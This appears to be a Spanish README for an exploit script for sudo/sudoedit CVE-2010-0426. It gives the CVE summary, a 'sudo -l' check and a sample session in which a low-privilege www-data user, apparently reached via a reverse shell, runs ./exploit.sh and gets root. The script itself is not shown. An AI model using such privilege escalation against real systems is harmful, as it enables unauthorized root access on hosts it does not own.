
sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 - Escalada de privilegios con sudo y sudoedit
https://www.cvedetails.com/cve/CVE-2010-0426/
sudo 1.6.x anterior a 1.6.9p21 y 1.7.x anterior a 1.7.2p4, cuando un pseudo-comando está habilitado, permite una coincidencia entre el nombre del pseudo-comando y el nombre de un archivo ejecutable en un directorio arbitrario, lo que permite a usuarios locales obtener privilegios a través de un archivo ejecutable manipulado, como se demuestra con un archivo llamado sudoedit en el directorio personal de un usuario.
Escalar privilegios cuando el binario sudoedit tiene permiso suid y se puede editar un archivo como sudo (comprobar con sudo -l)
./exploit.sh
Escalar a root desde una shell inversa de bajos privilegios
www-data@g1vi:/var/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@g1vi:/var/tmp$ ./exploit.sh
[+] Target is vulnerable
[+] Running stuff...
root@g1vi:/var/tmp$ id
uid=0(root) gid=0(root) groups=0(root)
Siéntete libre de usar o modificar cuando y donde quieras